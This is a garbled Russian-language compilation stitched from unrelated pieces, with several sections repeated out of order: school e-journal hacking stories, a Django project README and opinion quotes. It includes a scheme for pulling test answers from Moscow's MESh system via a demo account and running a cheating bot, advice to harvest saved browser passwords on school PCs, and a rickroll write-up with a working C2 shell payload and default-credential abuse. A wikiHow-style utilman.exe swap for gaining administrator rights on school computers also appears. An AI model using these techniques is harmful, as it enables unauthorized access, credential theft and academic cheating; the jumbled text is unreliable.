Disclaimer
Этот пост предназначен только для образовательных целей. Не выполняйте подобные действия без явного разрешения.
Мы подготовили полную документацию обо всём, что мы делали, включая рекомендации по устранению обнаруженных нами уязвимостей. Мы предоставили в технический отдел D214 полный отчёт о тестировании на проникновение на 26 страницах и работали с отделом, чтобы помочь защитить их сеть.
При этом то, что мы сделали, было очень незаконно, и другие администрации могли выдвинуть обвинения. Мы благодарны, что администрация D214 отнеслась к этому с пониманием.
Начало
Шла весна. Москва начала активно интегрировать в школы цифровые системы. В один момент в школах появились Цифровые Домашние Задания (далее ЦДЗ). Они представляют из себя тест, по результатам которого ставится оценка. С этого момента я стал глубже изучать работу МЭШ.
При первичном анализе ЦДЗ я сразу заметил интересное поле “right_answer” в ответе на AJAX запрос.
Поняв, что из этого можно извлечь выгоду, я стал изучать далее. Выяснилось, что поле возвращало null только с аккаунта ученика. С аккаунта родителя, демонстрационного аккаунта (для мобильного приложения) или аккаунта учителя это поле прекрасно отображалось.
Вооружившись демонстрационным аккаунтом я написал корявенький Python скрипт, который благополучно мне выдавал ответы на тесты.
Начало
Шла весна. Москва начала активно интегрировать в школы цифровые системы. В один момент в школах появились Цифровые Домашние Задания (далее ЦДЗ). Они представляют из себя тест, по результатам которого ставится оценка. С этого момента я стал глубже изучать работу МЭШ.
При первичном анализе ЦДЗ я сразу заметил интересное поле “right_answer” в ответе на AJAX запрос.

Поняв, что из этого можно извлечь выгоду, я стал изучать далее. Выяснилось, что поле возвращало null только с аккаунта ученика. С аккаунта родителя, демонстрационного аккаунта (для мобильного приложения) или аккаунта учителя это поле прекрасно отображалось.
Вооружившись демонстрационным аккаунтом я написал корявенький Python скрипт, который благополучно мне выдавал ответы на тесты.

Электронный дневник школы
Этот сайт – интерфейс для учеников школы. Здесь можно посмотреть оценки, расписание и прочую открытую информацию. Учителя заполняют базу данных через другой сайт. Ставят там оценки и т.д.
Описание моделей
На сайте есть ученики: Schoolkid
. Класс ученика определяется через комбинацию его полей year_of_study
— год обучения и group_letter
— литера класса. Вместе получается, например, 10А. Ученик связан со следующими моделями:
Mark
— оценка на уроке, от 2 до 5.Commendation
— похвала от учителя, за особые достижения.Chastisement
— замечание от учителя, за особые проступки.
Все 3 объекта связаны не только с учителем, который их создал, но и с учебным предметом (Subject
). Примеры Subject
:
- Математика 8 класса
- Геометрия 11 класса
- Русский язык 1 класса
- Русский язык 4 класса
Subject
определяется не только названием, но и годом обучения, для которого учебный предмет проходит.
За расписание уроков отвечает модель Lesson
. Каждый объект Lesson
— урок в расписании. У урока есть комбинация year_of_study
и group_letter
, благодаря ей можно узнать для какого класса проходит этот урок. У урока есть subject
и teacher
, которые отвечают на вопросы “что за урок” и “кто ведёт”. У урока есть room
— номер кабинета, где он проходит. Урок проходит в дату date
.
Расписание в школе строится по слотам:
- 8:00-8:40 — 1 урок
- 8:50-9:30 — 2 урок
- …
У каждого Lesson
есть поле timeslot
, которое объясняет, какой номер у этого урока в расписании.
Запуск
- Скачайте код
- Установите зависимости командой
pip install -r requirements.txt
- Создайте БД командой
python3 manage.py migrate
- Запустите сервер командой
python3 manage.py runserver
Переменные окружения
Часть настроек проекта берётся из переменных окружения. Чтобы их определить, создайте файл .env
рядом с manage.py
и запишите туда данные в таком формате: ПЕРЕМЕННАЯ=значение
.
Доступны 3 переменные:
DEBUG
— дебаг-режим. Поставьте True, чтобы увидеть отладочную информацию в случае ошибки.SECRET_KEY
— секретный ключ проектаALLOWED_HOSTS
— см документацию Django.DATABASE_NAME
— путь до базы данных, например:schoolbase.sqlite3
Цели проекта
Код написан в учебных целях — это урок в курсе по Python и веб-разработке на сайте Devman.
Привет у нас в школе есть компы связанные по локалке. Раньше мы на них играли. Но класс рук аоставил на них парроль а завуч разрешает но пароля не знает. иак вот я включил перепробовал кучу паролей потом перезапустил комп и зажал ф8 вылез список с устройвствами жосткий диск, и дисковод я выбрвл дисковод. он начал грузиться выпал список включить командную стороку и востановление системы я выбрал востановление прошло время он перезагрузился и запустился без пароля! А почему этот трюк не помогает на других компах?? список выходит большой ньо нет востановления системы помогите плиз!
Если пароль стоит на сервере, то ломать его с компа – мёртвый номер.
А спрашивать совет, как сломать на форуме – называется “подготовка к совершению преступления, пред. ст. 272 УК РФ п2 по предварительному сговору группой лиц. ” Там до 3-х лет, кстати! !
Но я, как сисадмин, не стал бы никому рассказывать. Просто у меня подобные “херакеры” в туалете поскальзываются. Совесть мучает – ноги не держат ;))
Здравствуйте, расскажу немного сегодня про Электронный Журнал и очевидном методе входа в него.
Начну с того, что недавно в школе сделали этот Электронный Журнал, ведь школа должна быть современной, а бумажные журналы канули в историю. Плюсов конечно больше, чем минусов.
- Нужен комп и интернет.
- Нельзя вырвать страницу или потерять дневник (минус школьникам)
Вот такие мои приблизительные плюсы и минусы этого Электронного Журнала. Кстати, стоит заметить, что 2000 рублей в год для школы. Увидел на сайте, что уже почти 600 школ пользуются их услугами — прибыль можете сами посчитать. С учеников деньги пока не просили, надеюсь, и не будут.
Журнал Хакер совместно с форумом АНТИЧАТ рекомендуют именно эту программу для взлома. Она единственная, которая по-настоящему работает практически со всеми электронными дневниками.
Не требует никаких навыков, просто следуйте инструкции.
Моя история взлома
На всякий случай, я ещё зашёл в школьный компьютер браузер Хром и посмотрел сохраненные пароли. Если не знаете, то в Google Chome можно посмотреть, зайдя в настройки — персональные — управление сохраненными паролями. Когда будете смотреть, не забудьте оставить друга-школьника на стреме.
Как я и думал, успешно вошёл на сайт и начал изучать его изнутри.
Тесты, домашняя работа, учебный форум, лента новостей, расписание уроков — всё, как я и думал.
Как вы уже поняли, взломать Электронный Журнал — это вам не ликвидация зао. Тут всё сложнее. Но я ведь не взламывал, а просто узнал пароль. Это ещё раз доказывает тот факт, что не стоит забывать про способы взлома в реальной жизни. Надеюсь, никто из школы эту статью не прочтёт и меня не вычислят по ip, хотя у меня всё равно динамический.
Привет, Хабр! Я бы хотел поделиться с вами историей о том, как я пользовался недоработками системы Московской Электронной Школы (далее МЭШ).
Дополнительные статьи
Полезная нагрузка C2 и эксплойт
Первое, на чём мы сосредоточились, — это выяснение того, как управлять всеми проекторами одновременно. Хотя мы могли бы отправлять команды на каждый приёмник с помощью веб-интерфейса, это было бы неидеально, если бы мы спамили HTTP-трафик на каждый приёмник одновременно.
Вместо этого как канал управления я использовал SSH-доступ на каждом приёмнике (C2). Я разработал простой сценарий, который послужил поэтапной полезной нагрузкой, загружаемой в каждый приёмник заранее. Этот скрипт содержал различные функции, которые могли выполнять запросы к веб-интерфейсу локально на приёмнике. Благодаря повышенной гибкости полезной нагрузки я также мог создавать резервные копии и восстанавливать настройки приёмника в файловой системе после рикролла:
#!/bin/sh
# get IP address of receiver's main interface for use in HTTP requests to self
# web server is not bound to localhost, so this IP has to be used
ip_address=$(/sbin/ifconfig | grep -E "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep -v 127.0.0.1 | awk '{print $2}' | cut -f2 -d:)
# POST helper function
sendRequest() { content=$1 length=${#content} header="POST /cgi-bin/json_xfer HTTP/1.1\r\nHost: $ip_address\r\nContent-Type: application/json\r\nContent-Length: $length\r\nAuthorization: Basic bnVueWE6YnVzaW5lc3M=\r\n\r\n" echo -e "${header}" "${content}" | nc "$ip_address" 80
}
# JSON POST data to send "power on" serial command
jsonSerialPowerOn='{"params":{"TVCtrlType":"serial","serialPort":"Serial","standbyActions":"tv_off","unstandbyActions":"tv_on","ToggleDelay":"0","serialActions":"tv_on"},"action":"apply_send"}'
# ... more JSON data payloads
# sample macro function to loop request for three minutes
exampleMacro() { secs=180 endTime=$(( $(date +%s) + secs )) while [ $(date +%s) -lt $endTime ]; do sendRequest "$jsonSerialPowerOn" sleep 10 done
}
# delete script from filesystem
selfDestruct() { rm -- "$0"
}
# ./b1gr1ck.sh 1
if [ "$1" -eq "1" ]; then exampleMacro
# ./b1gr1ck.sh 2
elif [ "$1" -eq "2" ]; then selfDestruct
Это примерная версия полезной нагрузки C2. В реальной полезной нагрузке, чтобы поддерживать работу рикролла, я многократно повторял команды. Например, каждые 10 секунд дисплей включался и устанавливал максимальную громкость.
Таким образом, если кто-то попытается выключить проектор или отключить звук, он вернётся и продолжит воспроизведение. Есть только два способа отключить рикролл — выдернуть вилку из розетки или изменить источник входного сигнала.
Циклическое изменение входного сигнала вызывает вспышки, даже если текущий источник совпадает с последним источником. Мне пришлось полагаться на отказоустойчивый входной переключатель, который активировался прямо перед началом рикролла, чтобы все были настроены на него. Вы можете увидеть эту вспышку в видео на 48-й секунде.
Уязвимости, которые эксплуатировались для получения первоначального доступа, были специфичны для конкретной реализации (то есть D214 виновен в использовании паролей по умолчанию). Однако я обнаружил вендорные уязвимости эскалации привилегий во всех IPTV-продуктах Exterity, что позволило мне получить root-доступ во всех системах. Одна из этих ошибок была простым GTFO-bin, но две другие — новые уязвимости, которые я не могу (и не должен) публиковать.
Как я взломал Московскую Электронную Школу
Привет, Хабр! Я бы хотел поделиться с вами историей о том, как я пользовался недоработками системы Московской Электронной Школы (далее МЭШ).
Первый взлом
Эта история начинается с первого курса, когда у меня не было особой технической дисциплины: время, которое я могу описать только как начало моего скриптового детства. Я не понимал основ этики или ответственного раскрытия информации и прыгал от радости при любой возможности что-нибудь сломать.

И я снова заявляю: никогда не получайте несанкционированный доступ к другим системам без разрешения.
Технический персонал округа был проинформирован о проблеме, которую они решили, добавив ограничения ACL. Однако многие устройства оставались подключёнными к студенческой сети и, что более важно для этой статьи, к системе IPTV!
Исполнение
Одним из наших главных приоритетов было не допустить срыва занятий, то есть мы могли провести розыгрыш только до начала занятий, во время перемен или после уроков. До пандемии некоторые занятия начинались раньше, некоторые позже, в некоторых было блочное расписание, а в некоторых все уроки проходили в один день. Удобно, что благодаря COVID-19 все средние школы в округе перешли на единое блочное расписание, поэтому нам не нужно было беспокоиться о составлении расписания для каждой школы.
Ещё один момент — выпускные экзамены были не за горами. Наибольшее беспокойство вызвало стандартизированное тестирование, в котором не будет перерывов. Мы выбрали 30 апреля, это была пятница перед началом экзаменов по курсам повышенной сложности. Также мы провели обширный опрос, чтобы выяснить, проводились ли в этот день какие-либо значимые тестирования. Мы были полностью готовы всё отменить, если бы узнали, что проводится стандартизированное тестирование.
За несколько недель до Большого Рика мы установили полезную нагрузку C2 на все AvediaPlayers в автоматическом режиме, тщательно распыляя наши действия, чтобы избежать обнаружения. В день Большого Рика мы использовали два из семи серверов AvediaServers в качестве C2-мастеров, которые подключались ко всем AvediaPlayers и выполняли полезную нагрузку. Ниже приводится хронология событий 30 апреля:
Углубленный анализ
Всё! Казалось, жизнь в шоколаде! Но мною не был учтён 1 очень важный фактор. Тесты могли иметь несколько вариантов и соответственно для одного ученика могли показаться одни вопросы, а для другого другие. Тут я понял, что для дальнейшего изучения мне понадобится учительский аккаунт.

Давайте вернемся к тестам. С помощью аккаунта учителя я смог проанализировать то, как можно получать ответы по нужному варианту. Это прекрасно работало на демонстрационном аккаунте. Чтобы не выдавать постоянно ответы своим одноклассникам, я написал бота EasyЦДЗ.
Большой Рик
Для начала вот кое-какие кадры всего этого:
Как я хакнул все районные школы, чтобы показать рикролл, и что из этого вышло

30 апреля 2021 года автор проделал рикролл по своему школьному округу. Это не только моя школа, но и весь школьный городской округ 214 (далее — D214), один из крупнейших школьных округов в Иллинойсе, состоящий из 6 школ, в которых учатся более 11 000 человек.
Подробности рассказываем в этом пятничном посте к старту курса по этичному хакерству.
Эта история не из тех типичных рикроллов, когда студенты проносят Рика Астли на презентации, шоу талантов или звонки Zoom. Я исполнил рикролл, захватив каждый сетевой дисплей в каждой школе, чтобы транслировать «Never Gonna Give You Up» в полной синхронизации. Телевизор в коридоре, проектор в классе или большой экран, отображающий меню обеда, если они были подключены к сети, — я взломал их!
В этой заметке я расскажу, как я это сделал и как мне удалось избежать обнаружения, а ещё о последствиях, когда я раскрыл себя и не попал в беду.
Популярность
Всё шло своим чередом: бот работал, оценки ставились. Но в один момент на моего бота стали подписываться очень много людей. Как я понял, кто-то из знакомых моего друга заснял тикток, который очень сильно завирусился (мой бот был первым в этой нише). Я не преследовал цели заработать с бота, но подключил систему донатов, чтобы если люди хотели, то могли отблагодарить за старания.
Группа подписывала на себя ежедневно очень много людей, актив был очень большим. Стали появляться похожие проекты, а также просто ребята, которые пытались нажиться на имидже моего проекта. В любом случае дело шло и мне хватало благодарности людей, которым я смог помочь.
Подготовка
Перед вами второй семестр выпускного класса, начало 2021 года: все школы перешли на гибридное обучение из-за пандемии COVID-19. До этого момента очное обучение проводилось по желанию, большинство студентов, включая меня, обучались дистанционно. Но в марте суперинтендант объявил, что 5 апреля перейдёт на модель отказа от очного обучения.
Поскольку почти все ученики должны были вернуться в школу, я понял, что теперь и стоит устроить выпускной розыгрыш с участием системы IPTV. Через несколько дней я решил поделиться своими мыслями с близкими друзьями.

Я собрал небольшую команду по всему району и начал подготовку. Мы стали называть эту операцию «Большой Рик».
Об этой статье
Электронный дневник: мнение психологов и социолога
Юлия Букинга, психолог , считает, что полезное во многом нововведение повлекло за собой и негативные факторы:
«Если думать о школьном дневнике символически, он представляется хранителем событий самостоятельной жизни школьника (предметы, задания, оценки) – пространством первых лет жизни, более отдельной от родителей, чем раньше.
Такое пространство, с одной стороны, помогает школьнику вспомнить, какие у него завтра уроки, что взять с собой в школу, что проходили, что задали и т. д.
Екатерина Бойдек, психолог:
Николай Калмыков, директор Экспертно-аналитического центра Российской академии народного хозяйства и государственной службы при Президенте Российской Федерации (РАНХиГС)
Электронный дневник: мнение программиста
Дмитрий Кусков, ученик, интернет-пользователь:
Чтобы расставить все точки над i, мы обратились за комментарием к реальному программисту. Итак, Роман, программист:
Электронный дневник: мнение учителя
Объективности ради, мы решили в этой статье обратить внимание не только на то, как дети реагируют на электронный дневник, но и задействовали других участников процесса: педагога и родителя.
Андрей Сиденко, учитель информатики, абсолютный победитель школьного мастерства России-2013, член Молодежной общественной палаты России, входит в ТОП-10 самых влиятельных педагогов по версии Connect Learning Today:
Григорий Шабанов, проректор по учебной работе Российского нового университета (РосНОУ):
Минусов в электронном журнале я не вижу, он используется во многих странах. Электронный журнал — это такой же дневник, просто его не надо носить с собой. Минус только в том, что если родители не заинтересованы в учебе ребенка и не следят за его обучением, тогда они не будут смотреть электронный журнал. Хотя, к сожалению, и бумажный дневник не всегда интересен родителям, кроме как шлепнуть этим дневником ребенка.
Необходимость рассылки родителям уведомлений об оценках на электронную почту связана, скорее всего, как раз с тем, что не все родители готовы работать с электронным журналом. А с электронной почтой им привычнее.
Электронный дневник: что думают о нем родители
Ну и, конечно мы не могли не узнать мнение взрослых по вопросам оповещающего нововведения.
Людмила Булавкина, консультант по развитию:
«Я мама двух детей: сын в третьем классе, дочка – в первом. Учатся в одной школе. Из минусов электронного журнала – в порядке частоты наступления и по степени важности для мамы:
Технические сбои в работе – иногда в журнал просто невозможно зайти. Случается такое примерно раз в месяц.
Задержки в занесении учителями данных в журнал – когда контрольная была в четверг, а оценка за нее выставлена во вторник следующей недели, а никаких уведомлений, что в журнале появилась новая оценка за прошлый период, не присылают.
В начале учебного года журнал, как правило, не работает. Учитель начинает вести журнал где-то к середине октября, проставляя все прошлые оценки задним числом – в итоге картина первой четверти или триместра уже сформирована, и повлиять на итоги четверти уже почти невозможно.
Углубленный анализ
Всё! Казалось, жизнь в шоколаде! Но мною не был учтён 1 очень важный фактор. Тесты могли иметь несколько вариантов и соответственно для одного ученика могли показаться одни вопросы, а для другого другие. Тут я понял, что для дальнейшего изучения мне понадобится учительский аккаунт.
Давайте вернемся к тестам. С помощью аккаунта учителя я смог проанализировать то, как можно получать ответы по нужному варианту. Это прекрасно работало на демонстрационном аккаунте. Чтобы не выдавать постоянно ответы своим одноклассникам, я написал бота EasyЦДЗ.
Неожиданное развитие событий
Подобно тому, как AvediaPlayers связаны с AvediaServers, каждая колонка подключалась к серверу EPIC своей школы. Веб-интерфейс этих серверов был скрыт за страницей входа.
Учётные данные по умолчанию использовались только на одном сервере EPIC. Мы смогли изменить расписание звонков по своему усмотрению, а также загрузить кастомные звуковые сигналы. И смогли изменить звонки, чтобы они играли «Never Gonna Give You Up».

У нас был доступ только к системе EPIC этой отдельной школы, ведь только у неё были уязвимые учётные данные.
Но я обнаружил, что взломанный нами сервер EPIC еженедельно создавал резервные копии своей конфигурации на внешнем файловом ресурсе SMB. Учётные данные для этого SMB-сервера оказались такими же, как учётные данные по умолчанию в системе EPIC. Каждая резервная копия содержала SQL-дамп имён пользователей и хешей паролей.
А что, если другие системы EPIC также имеют серверы резервного копирования? А поскольку эти резервные серверы находятся отдельно от серверов EPIC, они могут по-прежнему использовать учётные данные по умолчанию.
Именно так и было! Оттуда я смог получить доступ к хешам паролей для других серверов EPIC и определить учётную запись локального администратора, доступную на всех серверах EPIC. После взлома пароля мы получили контроль над всеми расписаниями звонков в округе!
Многоадресный стрим RTP
Следующий вопрос, который мы решали, заключался в настройке пользовательского видеопотока для воспроизведения рикролла в режиме реального времени. Нам нужно было транслировать многоадресный трафик, но из-за ограничений ACL это могли делать только кодеры AvediaStream или серверы AvediaServer.
Настройка потока была, пожалуй, самой трудоёмкой частью подготовки, потому что тестирование стало абсолютным мучением. Для разработки мне нужен был только один проектор, но добраться до него нелегко: в классах работают весь день.
Поэтому я тестировал ночью! Подключался к одному из компьютеров класса с фронтальной камерой, направленной на проектор, записывал видео, чтобы проверить, правильно ли проектор отображает поток.
Для проверки качества потока я использовал цикл с прыгающим логотипом DVD.
Задержка, которую вы видите на видео, — одна из первых проблем, с которыми я столкнулся при работе с потоком. Оказалось, что попытка перенаправить UDP-трафик через кодеры AvediaStream добавляет слишком большую задержку. Я исправил это, транслируя многоадресную рассылку непосредственно с сервера AvediaServer с помощью ffmpeg. Надеюсь, я не напугал никого из персонала!
Система IPTV Exterity
Перед тем как двигаться дальше, я кратко обрисую систему IPTV. Она состоит из трёх элементов:
AvediaPlayers — это небольшие синие коробки, которые подключаются к проекторам и телевизорам. Они могут отправлять последовательные команды на соответствующее устройство для включения/выключения дисплея, изменения входов/громкости, переключения каналов и т. д.
Эти приёмники содержат как веб-интерфейс, так и SSH-сервер для выполнения последовательных команд. Кроме того, они работают под управлением встроенного Linux с инструментами BusyBox и используют какую-то непонятную архитектуру процессора, разработанную для IoT-устройств, под названием ARC (Argonaut RISC Core).

Далее кодеры AvediaStream подключаются к устройствам, транслирующим видео. Они кодируют прямой эфир, поступающий с этих устройств, на приёмники AvediaPlayer, которые отображают этот поток. Кодеры подключаются к компьютерам, которым необходимо транслировать поток, например текстовые карусели или утренние объявления. Они также имеют встроенное программное обеспечение, аналогичное AvediaPlayers.
И последнее, но не менее важное: AvediaServers позволяют администраторам управлять всеми приёмниками и кодерами одновременно. Их типичные процессоры x86_64 и работают под управлением корпоративного дистрибутива Linux, CentOS. Как и приёмники и кодеры они также имеют веб-интерфейсы и SSH-серверы.
С первого курса у меня был полный доступ к системе IPTV. Я возился с ним всего несколько раз и планировал устроить розыгрыш для старшеклассников, но он отошёл на задворки моего сознания и в конце концов был забыт.
Хронология событий
10:40. Поток рикролла запускается с 20-минутным обратным отсчётом.
10:55. Системы плеера Avedia инициализируются, включаются дисплеи и активный канал меняется на поток рикролла.
11:00. Поток завершает обратный отсчёт с проигрыванием рикролла в конце первого блока.
11:10. Полезная нагрузка восстанавливает системы AvediaPlayer в их предыдущее состояние и удаляет себя.
14:05. В конце третьего блока вместо звонка играет рикролл.
14:15. Отчёт о тесте на проникновение автоматически отправляется техническим руководителям.
Они всё же догадались, поэтому я включил аудиофайл сюда, чтобы и вы смогли им насладиться:
Популярность
Всё шло своим чередом: бот работал, оценки ставились. Но в один момент на моего бота стали подписываться очень много людей. Как я понял, кто-то из знакомых моего друга заснял тикток, который очень сильно завирусился (мой бот был первым в этой нише). Я не преследовал цели заработать с бота, но подключил систему донатов, чтобы если люди хотели, то могли отблагодарить за старания.
Группа подписывала на себя ежедневно очень много людей, актив был очень большим. Стали появляться похожие проекты, а также просто ребята, которые пытались нажиться на имидже моего проекта. В любом случае дело шло и мне хватало благодарности людей, которым я смог помочь.
Последствия
Через несколько дней после отправки отчёта через анонимный электронный ящик мы получили ответ по электронной почте от директора по технологиям D214. Директор заявил, что из-за наших рекомендаций и документации округ не будет применять дисциплинарные меры. Более того, он поблагодарил нас за наши выводы и попросил, чтобы мы предоставили отчёт команде технических специалистов. Позже он рассказал, что сами руководители проверили наш отчёт и были впечатлены им.
Я был в восторге от того, что администрация открыта для исправления своих проблем и проведения аудита вместе с нами. Хотя администрация D214 заявила о добрых намерениях (и действительно придерживалась их в будущем), мои сверстники не доверяли ей и скептически отнеслись к истинной природе встречи — один из них назвал всё это спецоперацией!
Мы решили, что на встрече Zoom я раскрою себя, чтобы представить слайды для подведения итогов, а остальные останутся анонимами. Я планировал объявить о своём участии с самого начала, так как хотел опубликовать этот пост в блоге. Но на всякий случай я назначил дебрифинг на время после окончания учёбы.
![Да, это реальный слайд из нашего брифинга. Не @ меня [мне всё равно, что вы подумаете] Да, это реальный слайд из нашего брифинга. Не @ меня [мне всё равно, что вы подумаете]](https://habrastorage.org/getpro/habr/upload_files/ed8/142/ecf/ed8142ecff097411dfea8ccb75fdbedc.jpeg)
Если серьёзно, дебрифинг прошёл очень хорошо и стал продуктивным для всех. Мы ответили на уточняющие вопросы технической команды и дали дополнительные советы по устранению проблемы. Нам даже удалось заставить округ рассмотреть возможность расширения программы IT/кибербезопасности и, надеюсь, спонсирования CTF в D214. Это одно из самых удивительных впечатлений из моей жизни в старшей школе, и я благодарю всех, кто поддержал меня. Это всё, и спасибо, что прочитали.
Если вы из D214 и у вас есть какие-нибудь видеоролики, фотографии или сообщения о рикролле в социальных сетях, отправьте их мне, и я поделюсь ими ниже с упоминанием.
А что вы взломали в своей школе? Поделитесь в комментариях.
Продолжить погружение в IT, чтобы научиться решать проблемы бизнеса, вы сможете на наших курсах:

Узнайте подробности здесь.
Другие профессии и курсы
Конец
Таким образом всё продолжалось до осени. Информация дошла до МЭШ и баги стали активно фикситься. В итоге я был вынужден закрыть проект. В любом случае для меня это был очень классный и приятный опыт.
Соавтор(ы): Jack Lloyd. Джек Ллойд — автор и редактор, пишущий о технологиях для wikiHow. Имеет более двух лет опыта в написании и редактировании статей на технические темы. Энтузиаст всего связанного с технологиями и учитель английского языка.
Из этой статьи вы узнаете, как получить права администратора на школьном компьютере. Имейте в виду, что если в школе стоят компьютеры Mac (хотя это маловероятно), их взломать не получится. Также взломать компьютер нельзя, если доступ к BIOS заблокирован.
Определите версию Windows. Хотя последней версией Windows является Windows 10, многие школьные компьютеры по-прежнему работают под управлением Windows 7. Если на компьютерах установлена Windows 7, используйте этот метод.
Подключите флеш-накопитель к домашнему компьютеру. Так как на многих школьных компьютерах установлены ограничения, флеш-накопитель придется настроить на домашнем компьютере (или любом другом компьютере, на котором нет ограничений).
- Не беспокойтесь — вы не устанавливаете Windows 10, а просто создаете установочный флеш-накопитель с помощью скачанного средства для установки Windows 10.
- Процесс может занять 30 минут, поэтому не отключайте флеш-накопитель.
- На ноутбуке USB-порты расположены на боковых панелях.
Откройте командную строку. На экране установки нажмите ⇧ Shift + F10 . Откроется окно командной строки.
- введите move c:\windows\system32\utilman.exe c:\windows\system32\utilman.exe.bak в командной строке;
- нажмите ↵ Enter ;
- введите copy c:\windows\system32\cmd.exe c:\windows\system32\utilman.exe в командной строке;
- нажмите ↵ Enter .
Перезагрузите компьютер без флеш-накопителя. Нажмите и удерживайте кнопку питания, чтобы выключить компьютер. Извлеките флеш-накопитель и нажмите кнопку питания, чтобы включить компьютер. Теперь создайте дополнительную учетную запись администратора.
Перезагрузите компьютер. Нажмите и удерживайте кнопку питания, чтобы выключить компьютер, а затем еще раз нажмите кнопку питания, чтобы включить его.
Подождите, пока откроются дополнительные варианты загрузки. В большинстве случаев компьютер предупредит вас, что Windows не завершила работу должным образом, поэтому выберите одну из опций с помощью клавиш со стрелками.
Выберите Обычная загрузка Windows . Эта опция находится посередине экрана. Чтобы подтвердить свой выбор, нажмите ↵ Enter .
Еще раз перезагрузите компьютер с помощью кнопки питания. Компьютер перезагрузится и откроются дополнительные варианты загрузки.
Выберите Запуск средства восстановления при загрузке (рекомендуется) . Эта опция находится посередине экрана. Запустится средство восстановления при загрузке.
Подождите, пока откроется экран входа в систему. Это произойдет, когда компьютер завершит перезагрузку.
Щелкните по значку Диспетчера утилит. Он выглядит как циферблат со стрелкой и находится в нижней левой части экрана. Так как вы заменили Диспетчер утилит на командную строку, откроется окно командной строки.
Работайте на компьютере с правами администратора. Теперь, когда вы вошли в систему как администратор, можно пользоваться всеми системными службами и программами.
- Получив права администратора, школьным компьютером можно пользоваться как любым другим компьютером. То есть можно устанавливать программы, менять настройки и так далее.
- Во многих школах используются программы контроля, которые следят за тем, что вы делаете на компьютере. В этом случае вас поймают, если вы взломаете компьютер.
- Взлом школьного компьютера противоречит школьным правилам, поэтому вас могут наказать.
Конец
Таким образом всё продолжалось до осени. Информация дошла до МЭШ и баги стали активно фикситься. В итоге я был вынужден закрыть проект. В любом случае для меня это был очень классный и приятный опыт.
Спасибо что прочитали эту статью.